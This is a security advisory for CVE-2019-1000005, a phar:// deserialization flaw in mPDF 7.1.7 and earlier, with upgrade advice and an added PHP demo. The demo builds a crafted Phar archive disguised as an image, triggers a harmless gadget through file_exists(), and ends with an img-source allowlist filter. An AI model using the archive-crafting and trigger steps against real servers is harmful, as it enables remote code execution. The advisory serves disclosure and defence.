PT-2019-11259 · Mpdf · Mpdf

By qwert · Published 2019-02-04 · Updated 2022-05-14

CVE-2019-1000005 · CVSS v3.1 8.8 (High) · Vector AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Name of the Vulnerable Software and Affected Versions: mPDF versions 7.1.7 and earlier
Description: mPDF 7.1.7 and earlier contain a Deserialization of Untrusted Data (CWE-502) vulnerability in the getImage() method of the Image/ImageProcessor class. getImage() hands the src path of an <img> tag to PHP filesystem functions without rejecting the phar:// stream wrapper. When PHP opens or stats a phar:// path it parses the archive and unserializes the metadata stored in its manifest, so a crafted archive can trigger a gadget chain in the application without any explicit unserialize() call, resulting in arbitrary code execution, file write, etc. To exploit the issue an attacker places a crafted Phar archive on the victim server (the phar wrapper ignores the file extension, so it can be uploaded under an image-looking name) and triggers generation of a PDF whose HTML contains <img src="phar://path/to/crafted/image">.
Recommendations: Update mPDF to version 7.1.8 or later, which resolves the issue. If you cannot upgrade immediately, do not pass untrusted HTML to mPDF, and reject any <img src> that uses a PHP stream wrapper before the HTML reaches the library; allowlist http(s), data: and plain relative paths rather than denying only phar://, and compare the scheme case-insensitively because PHP resolves wrapper names that way. Since the phar wrapper works on any file extension, do not rely on upload filtering by extension or MIME type to keep crafted archives off the server. Restricting or wrapping getImage() in Image/ImageProcessor is only a short-lived stopgap, because it is the method that loads every image in the document.
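The PHP script below is an added example, not code from mPDF or from this advisory. It demonstrates the two points above: first, that a phar:// path reaching an ordinary filesystem call such as file_exists() unserializes attacker-controlled metadata (the gadget class LogEntry is hypothetical and only writes a marker file; no mPDF gadget chain is shown), and second, a pre-processing filter for callers that cannot upgrade yet. The function names buildCraftedPhar, markerPath and rejectDangerousImageSources are assumptions of this example. The trigger step needs PHP 7.x with phar.readonly=0; PHP 8.0 stopped unserializing phar metadata on load, so on 8.x the marker check prints "no" while the filter still behaves the same.

```php
<?php
// Added example (not mPDF's own code): why a phar:// path reaching a
// filesystem call is dangerous, and a pre-mPDF filter that rejects it.
// Run with:  php -d phar.readonly=0 phar_img_demo.php   (PHP 7.x)
declare(strict_types=1);

// Hypothetical gadget class standing in for any autoloadable class with a
// magic method; in a real chain it would write a file or run code.
class LogEntry
{
    public $msg = '';

    public function __wakeup()
    {
        file_put_contents(markerPath(), 'metadata unserialized: ' . $this->msg);
    }
}

function markerPath(): string
{
    return sys_get_temp_dir() . '/phar_wakeup_marker';
}

// 1. Build the crafted archive. An attacker does this offline; only the
//    resulting bytes need to land on the victim server.
function buildCraftedPhar(string $path): void
{
    if (ini_get('phar.readonly')) {
        fwrite(STDERR, "Run with -d phar.readonly=0 to build the archive\n");
        exit(1);
    }
    @unlink($path);
    $phar = new Phar($path);           // creation requires a .phar file name
    $phar->startBuffering();
    $phar->addFromString('dummy.txt', 'not an image');
    $phar->setStub('<?php __HALT_COMPILER(); ?>');
    $entry = new LogEntry();
    $entry->msg = 'payload carried in phar metadata';
    $phar->setMetadata($entry);        // serialize()d into the manifest
    $phar->stopBuffering();
}

$archive   = sys_get_temp_dir() . '/crafted.phar';
$disguised = sys_get_temp_dir() . '/logo.jpg';   // extension is irrelevant to phar://
buildCraftedPhar($archive);
copy($archive, $disguised);

// 2. The sink. getImage() ends up calling functions like this on the src
//    path; with the phar:// wrapper PHP parses the archive and (on 7.x)
//    unserializes its metadata before answering, so __wakeup() fires without
//    any unserialize() call in the application.
@unlink(markerPath());
file_exists('phar://' . $disguised . '/dummy.txt');
printf("gadget ran via file_exists(): %s\n", file_exists(markerPath()) ? 'yes' : 'no');

// 3. Workaround for callers that cannot upgrade yet: allowlist <img src>
//    schemes before the HTML reaches mPDF. Entities are decoded first so that
//    phar&#58;// cannot slip past, and the scheme is compared case-insensitively
//    because PHP resolves stream wrapper names that way.
function rejectDangerousImageSources(string $html): string
{
    return preg_replace_callback(
        '/<img\b[^>]*?\bsrc\s*=\s*(["\']?)([^"\'\s>]+)\1[^>]*>/i',
        function (array $m): string {
            $src = trim(html_entity_decode($m[2], ENT_QUOTES | ENT_HTML5));
            // Two or more letters before ':' is a scheme (a single letter is a Windows drive).
            if (preg_match('#^([a-z][a-z0-9+.-]+):#i', $src, $s)
                && !in_array(strtolower($s[1]), ['http', 'https', 'data'], true)) {
                return '<!-- image removed: disallowed source scheme -->';
            }
            return $m[0];
        },
        $html
    );
}

// Constructed input: a relative image, a data: URI and two phar:// attempts.
$html = '<p>Invoice</p>'
      . '<img src="img/logo.png">'
      . '<img src="data:image/gif;base64,R0lGODlhAQABAAAAACw=">'
      . '<img src="phar://' . $disguised . '/dummy.txt">'
      . "<img src='PHAR&#58;//" . $disguised . "'>";
echo rejectDangerousImageSources($html), "\n";
// Only the first two <img> tags survive; the result is what goes to $mpdf->WriteHTML().
```

The filter is a stopgap, not a substitute for 7.1.8: it only covers <img src>, and any other place the application lets a user-supplied path reach a PHP filesystem function needs the same scheme allowlist.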

Weakness Enumeration

CWE-502: Deserialization of Untrusted Data

Related Identifiers

CVE-2019-1000005
GHSA-3CWC-M7C2-QR86

Affected Products

Mpdf